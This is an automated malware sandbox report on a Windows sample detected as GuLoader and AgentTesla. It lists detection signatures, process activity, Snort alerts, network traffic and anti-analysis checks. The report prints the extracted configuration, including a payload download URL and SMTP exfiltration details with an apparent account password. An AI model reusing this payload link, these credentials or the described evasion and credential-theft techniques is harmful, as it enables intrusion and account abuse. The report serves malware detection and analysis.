Windows Analysis Report
xcVh7ZmH4Y.exe

Overview

General Information

Sample Name:xcVh7ZmH4Y.exe
Analysis ID:623886
MD5:d17d180329065df1bf54501a2c8e138b
SHA1:255c70621a90d6070d2585ef47eaff05c143c54a
SHA256:6a3b4d2025462d750011db9881bd74700cf7e2e7708398a18dfec422555ba438

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Yara detected GuLoader
Snort IDS alert for network traffic
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to detect virtual machines (SIDT)
Contains long sleeps (>= 3 min)
Enables debug privileges
Contains functionality to detect virtual machines (SMSW)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • xcVh7ZmH4Y.exe (PID: 2648 cmdline: "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" MD5: D17D180329065DF1BF54501A2C8E138B)
    • CasPol.exe (PID: 5768 cmdline: "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 2016 cmdline: "C:\Users\user\Desktop\xcVh7ZmH4Y.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
{"Exfil Mode": "SMTP", "SMTP Info": "administracion@comansi.comJUGuete$2021mail.comansi.comfedericornanetti1990@gmail.com"}
{"Payload URL": "https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA"}
Source | Rule | Description | Author | Strings
00000004.00000000.26061242461.0000000001100000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen |
          • 0x31250:$s10: logins
          • 0x485b4:$s10: logins
          • 0x4f838:$s11: credential
          • 0x1e4a:$m1: yyyy-MM-dd hh-mm-ssCookieapplication/zipSCSC_.jpegScreenshotimage/jpeg/log.tmpKLKL_.html<html></html>Logtext/html[]Time
          • 0x2993:$m3: >{CTRL}</font>Windows RDPcredentialpolicyblobrdgchrome{{{0}}}CopyToComputeHashsha512CopySystemDrive\WScript.ShellRegReadg401
          • 0x1f6b:$m5: \WindowsLoad%ftphost%/%ftpuser%%ftppassword%STORLengthWriteCloseGetBytesOpera
          No Sigma rule has matched
          Timestamp:05/10/22-22:12:51.209096
          Source IP:192.168.11.20
          Destination IP:77.246.191.210
          SID:2839723
          Source Port:49771
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Timestamp:05/10/22-22:12:51.209113
          Source IP:192.168.11.20
          Destination IP:77.246.191.210
          SID:2840032
          Source Port:49771
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Timestamp:05/10/22-22:12:47.103829
          Source IP:192.168.11.20
          Destination IP:77.246.191.210
          SID:2839723
          Source Port:49769
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Timestamp:05/10/22-22:12:47.103924
          Source IP:192.168.11.20
          Destination IP:77.246.191.210
          SID:2840032
          Source Port:49769
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Timestamp:05/10/22-22:12:47.103829
          Source IP:192.168.11.20
          Destination IP:77.246.191.210
          SID:2030171
          Source Port:49769
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Timestamp:05/10/22-22:12:51.209096
          Source IP:192.168.11.20
          Destination IP:77.246.191.210
          SID:2030171
          Source Port:49771
          Destination Port:587
          Protocol:TCP
          Classtype:A Network Trojan was detected

          AV Detection

          Source: 00000004.00000000.26061242461.0000000001100000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA"}
          Source: conhost.exe.428.6.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "administracion@comansi.comJUGuete$2021mail.comansi.comfedericornanetti1990@gmail.com"}
          Source: xcVh7ZmH4Y.exeVirustotal: Detection: 38%
          Source: xcVh7ZmH4Y.exeMetadefender: Detection: 22%
          Source: xcVh7ZmH4Y.exeReversingLabs: Detection: 39%
          Source: xcVh7ZmH4Y.exeAvira: detected
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_01512E68 CryptUnprotectData,4_2_01512E68
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 4_2_015134F9 CryptUnprotectData,4_2_015134F9
          Source: xcVh7ZmH4Y.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.11.20:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.11.20:49756 version: TLS 1.2
          Source: xcVh7ZmH4Y.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.dr
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.dr
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B

          Networking

          Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.11.20:49769 -> 77.246.191.210:587
          Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49769 -> 77.246.191.210:587
          Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.11.20:49769 -> 77.246.191.210:587
          Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.11.20:49771 -> 77.246.191.210:587
          Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49771 -> 77.246.191.210:587
          Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.11.20:49771 -> 77.246.191.210:587
          Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA
          Source: Joe Sandbox ViewASN Name: BITNAPbitNAPDatacenter01BarcelonaES BITNAPbitNAPDatacenter01BarcelonaES
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17p4i7ofbgdc9th89j41hsrn1o/1652213400000/13619548348121457133/*/1VssbX_L5DESUoNwRHcbF42fii8wzHqEA?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-70-docs.googleusercontent.comConnection: Keep-Alive
          Source: global trafficTCP traffic: 192.168.11.20:49769 -> 77.246.191.210:587
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: CasPol.exe, 00000004.00000003.27210315170.0000000020AF1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30953010911.000000001DA23000.00000004.00000800.00020000.00000000.sdmp, Cookies.4.drString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
          Source: Cookies.4.drString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
          Source: CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://SckyfZ.com
          Source: CasPol.exe, 00000004.00000002.30953405175.000000001DA52000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952819183.000000001DA13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.comansi.com
          Source: xcVh7ZmH4Y.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: CasPol.exe, 00000004.00000002.30952228522.000000001D9B3000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952931628.000000001DA1D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.27106953909.000000001C631000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30952729098.000000001DA0D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30953010911.000000001DA23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://SqvSXVgUZh6rJgTP37.com
          Source: CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-70-docs.googleusercontent.com/
          Source: CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-70-docs.googleusercontent.com/=(
          Source: CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-70-docs.googleusercontent.com/G
          Source: CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-70-docs.googleusercontent.com/R
          Source: CasPol.exe, 00000004.00000003.26186745268.0000000001375000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30927389187.000000000135C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doc-10-70-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/vvokdj17
          Source: CasPol.exe, 00000004.00000002.30926901479.00000000012F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
          Source: CasPol.exe, 00000004.00000002.30925433804.0000000000D80000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30927214585.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VssbX_L5DESUoNwRHcbF42fii8wzHqEA
          Source: CasPol.exe, 00000004.00000002.30926901479.00000000012F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/w
          Source: AsOpenFile.exe.1.drString found in binary or memory: https://www.digicert.com/CPS0
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.drString found in binary or memory: https://www.globalsign.com/repository/0
          Source: CasPol.exe, 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: unknownDNS traffic detected: queries for: drive.google.com
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004056DE

          System Summary

          Source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: Process Memory Space: CasPol.exe PID: 2016, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
          Source: 00000004.00000002.30951277125.000000001D8E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: Process Memory Space: CasPol.exe PID: 2016, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F55355 LoadLibraryA,NtAllocateVirtualMemory,1_2_02F55355
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F5770E NtResumeThread,1_2_02F5770E
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F57165 NtProtectVirtualMemory,1_2_02F57165
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameAsOpenFile.exeL vs xcVh7ZmH4Y.exe
          Source: xcVh7ZmH4Y.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: AsOpenFile.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Section loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll
          Source: xcVh7ZmH4Y.exe Virustotal: Detection: 38%
          Source: xcVh7ZmH4Y.exe Metadefender: Detection: 22%
          Source: xcVh7ZmH4Y.exe ReversingLabs: Detection: 39%
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe File read: C:\Users\user\Desktop\xcVh7ZmH4Y.exe
          Source: xcVh7ZmH4Y.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\xcVh7ZmH4Y.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\xcVh7ZmH4Y.exe"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040352D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File created: C:\Users\user\AppData\Roaming\umsqbqzt.0jv
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe File created: C:\Users\user\AppData\Local\Temp\nsn9685.tmp
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/10@3/4
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_004021AA CoCreateInstance,1_2_004021AA
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_0040498A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:428:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:428:304:WilStaging_02
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe File written: C:\Users\user\AppData\Local\Temp\duperinger.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: xcVh7ZmH4Y.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.dr
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL source: xcVh7ZmH4Y.exe, 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp, AsOpenFile.exe.1.dr

          Data Obfuscation

          Source: Yara match File source: 00000004.00000000.26061242461.0000000001100000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.26210459102.0000000002F40000.00000040.00000001.00040000.00000008.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_710330C0 push eax; ret 1_2_710330EE
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F46E83 push ss; ret 1_2_02F46E46
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F48E76 push 0000002Fh; retf 1_2_02F48F5F
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F48E2E push 0000002Fh; retf 1_2_02F48F5F
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F46E15 push ss; ret 1_2_02F46E46
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F48BF9 push eax; iretd 1_2_02F48C12
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F43F73 push es; iretd 1_2_02F43F74
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F46B7F push es; ret 1_2_02F46B80
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F48F01 push 0000002Fh; retf 1_2_02F48F5F
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F484E7 push 0000002Fh; retf 1_2_02F48F5F
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F471E1 push FFFFFFA5h; ret 1_2_02F471E3
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F455E3 pushad ; ret 1_2_02F455E4
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_02F47DC9 push esi; iretd 1_2_02F47DCA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_0104FA58 push edx; ret 4_2_0104FA5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 4_2_01272177 push edi; retn 0000h 4_2_01272179
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Code function: 1_2_71031BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_71031BFF
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe File created: C:\Users\user\AppData\Local\Temp\AsOpenFile.exe
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe File created: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\xcVh7ZmH4Y.exe File opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe
          Source: CasPol.exe, 00000004.00000002.30925433804.0000000000D80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1VSSBX_L5DESUONWRHCBF42FII8WZHQEA
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26209733648.0000000000823000.00000004.00000020.00020000.00000000.sdmp, xcVh7ZmH4Y.exe, 00000001.00000002.26210603305.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.30925433804.0000000000D80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26210603305.0000000002F60000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
          Source: xcVh7ZmH4Y.exe, 00000001.00000002.26209406017.00000000007DC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
